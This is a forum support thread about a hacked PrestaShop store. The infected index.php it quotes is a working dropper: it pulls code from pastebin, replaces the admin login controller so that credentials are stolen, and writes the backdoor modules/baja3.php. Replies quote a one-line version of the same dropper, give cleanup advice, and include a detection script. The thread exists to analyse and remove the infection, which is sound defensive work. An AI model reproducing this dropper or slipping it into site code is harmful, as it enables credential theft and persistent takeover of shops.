
Error message on my e-commerce site


SBCOM


Hello,

I have just realized that I can no longer get into my PrestaShop back office.

And my site shows:


Warning: chmod(): No such file or directory in /homepages/11/d782354914/htdocs/clickandbuilds/PrestaShop/MyeCommerce/index.php on line 46

Warning: chmod(): No such file or directory in /homepages/11/d782354914/htdocs/clickandbuilds/PrestaShop/MyeCommerce/index.php on line 47

 

Can you help me?

 

Thanks in advance

Link to comment
Share on other sites

Here is the file in question

 

<?php
/*
* 2007-2017 PrestaShop
*
* NOTICE OF LICENSE
*
* This source file is subject to the Open Software License (OSL 3.0)
* that is bundled with this package in the file LICENSE.txt.
* It is also available through the world-wide-web at this URL:
* http://opensource.org/licenses/osl-3.0.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to [email protected] so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade PrestaShop to newer
* versions in the future. If you wish to customize PrestaShop for your
* needs please refer to http://www.prestashop.com for more information.
*
*  @author PrestaShop SA <[email protected]>
*  @copyright  2007-2017 PrestaShop SA
*  @license   http://opensource.org/licenses/osl-3.0.php  Open Software License (OSL 3.0)
*  International Registered Trademark & Property of PrestaShop SA
*/
function curl_get_contents($url){$curl = curl_init($url);curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0);curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);$data = curl_exec($curl);curl_close($curl);return $data;}
if(file_exists($_SERVER['DOCUMENT_ROOT'] . "/controllers/admin/AdminLoginController.php")){
$html1=file_get_contents("https://pastebin.com/raw/EmUJU0dh");
if(!preg_match("/baja/i",$html1)){$html1=curl_get_contents("https://pastebin.com/raw/EmUJU0dh");}
$save1=fopen($_SERVER['DOCUMENT_ROOT'] . "/controllers/admin/AdminLoginController.php","w");
fwrite($save1,$html1);
fclose($save1);
}
if(file_exists($_SERVER['DOCUMENT_ROOT'] . "/controllers/AdminLoginController.php")){
$html1=file_get_contents("https://pastebin.com/raw/EmUJU0dh");
if(!preg_match("/baja/i",$html1)){$html1=curl_get_contents("https://pastebin.com/raw/EmUJU0dh");}
$save2=fopen($_SERVER['DOCUMENT_ROOT'] . "/controllers/AdminLoginController.php","w");
fwrite($save2,$html1);
fclose($save2);
}
$htm=file_get_contents("https://pastebin.com/raw/geUPuVMP");
if(!preg_match("/XATAJAB/i",$htm)){$htm=curl_get_contents("https://pastebin.com/raw/geUPuVMP");}
$save=fopen($_SERVER['DOCUMENT_ROOT'] . "/modules/baja3.php","w");
fwrite($save,$htm);
fclose($save);    
chmod("./". $_SERVER['DOCUMENT_ROOT'] ."/index.php",0755);
chmod("./" .$_SERVER['DOCUMENT_ROOT'] ."/modules/baja3.php",0755);
require(dirname(__FILE__).'/config/config.inc.php');
Dispatcher::getInstance()->dispatch();

Link to comment
Share on other sites

Always the same s****y hacker group, bajatax with their hous, but now they are modernizing: they receive the logins in real time on a Telegram account,
so don't forget to change your admin passwords as soon as you have cleaned up (before that it is pointless)

Link to comment
Share on other sites

Well, if you don't read...

- Fix the PHPUnit flaw

- the file /controllers/admin/adminloginController.php needs to be restored

- The file /modules/baja3.php needs to be deleted, and surely many others ^^

Link to comment
Share on other sites

It is not enough to put the original index back; you have to inspect, clean and disinfect your whole space, which now surely contains dozens, even hundreds, of new intrusion points. Your BO credentials have been stolen, your AdminLoginController file has been hacked (as seen here https://pastebin.com/raw/EmUJU0dh), and this is only the visible part of the iceberg, since on top of that there is a micro-loader for arbitrary code in this new controller.

 

Edited by doekia (see edit history)
Link to comment
Share on other sites
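A triage pass for the cleanup steps and the full inspection called for in the posts above, as an added example that is not part of any post in this thread. It flags PHP files carrying the indicators visible in the quoted index.php; the rule names, `scan_tree` and `demo` are hypothetical, the sample tree is constructed, and reading "the PHPUnit flaw" as a phpunit folder left under a vendor/ directory is an assumption.

```python
import re
import tempfile
from pathlib import Path

# Indicators copied from the infected index.php quoted in this thread.
CONTENT_RULES = {
    "remote-paste-fetch": re.compile(rb"pastebin\.com/raw/", re.I),
    "dropper-marker": re.compile(rb"XATAJAB|baja3\.php", re.I),
    "tls-check-disabled": re.compile(rb"CURLOPT_SSL_VERIFY(PEER|HOST)\s*,\s*(0|false)", re.I),
}
DROPPED_NAME = re.compile(r"^baja\d*\.php$", re.I)  # e.g. modules/baja3.php
LOGIN_MARKER = re.compile(rb"baja", re.I)  # string the dropper looks for in the replaced controller

def scan_tree(root):
    """Return sorted (relative_path, rule) findings under a shop root."""
    root, findings = Path(root), set()
    for path in root.rglob("*"):
        rel = path.relative_to(root).as_posix()
        # Assumption: a phpunit folder shipped under vendor/ is the flaw to fix.
        if path.is_dir():
            if path.name == "phpunit" and path.parent.name == "vendor":
                findings.add((rel, "phpunit-in-webroot"))
            continue
        if path.suffix.lower() != ".php":
            continue
        if DROPPED_NAME.match(path.name):
            findings.add((rel, "dropped-file-name"))
        data = path.read_bytes()
        for rule, rx in CONTENT_RULES.items():
            if rx.search(data):
                findings.add((rel, rule))
        if path.name.lower() == "adminlogincontroller.php" and LOGIN_MARKER.search(data):
            findings.add((rel, "login-controller-tampered"))
    return sorted(findings)

def demo():
    """Build a small constructed tree (not real shop data) and scan it."""
    files = {
        "index.php": b'<?php $h=file_get_contents("https://pastebin.com/raw/PLACEHOLDER");',
        "modules/baja3.php": b"<?php /* XATAJAB */",
        "controllers/admin/AdminLoginController.php": b"<?php // baja",
        "classes/Tools.php": b"<?php class Tools {}",
        "modules/demo/vendor/phpunit/phpunit.php": b"<?php",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in files.items():
            target = Path(tmp, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(body)
        return scan_tree(tmp)
```

A hit list from `scan_tree` is a starting point for comparison against a clean copy of the same PrestaShop release, not proof that unflagged files are clean.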

In the meantime I sent an email to our dear friends at pastebin so that they try to do the bare minimum.

It won't fix the crashes when a hack happens, but the failure will be "cleaner" and won't spread a new flaw.

 

mailto: [email protected]

Quote

Hi,

For ages now, your platform has been hosting numerous nasty sources that hackers use to spread their nuisances.
Amongst them is a group called bajatax (various spellings): examples below
https://pastebin.com/qN54YWGT
https://pastebin.com/raw/EmUJU0dh
(to name a couple)

Exploiting a small breach or through social engineering, the hacker group elevates this into a major hack (including phishing, porn-like content, ...) using a single line of code.
file_put_content('controllers/admin/AdminLoginController.php',curl_get_contents("https://pastebin.com/raw/EmUJU0dh"));

It would be really appreciated if you could scan your assets for this bajatax-like content and simply delete it all (even try to filter it). I reckon this will not be a final solution, but each step that makes the life of hackers harder is good to go.

Best regards

Feel free to send them the same email
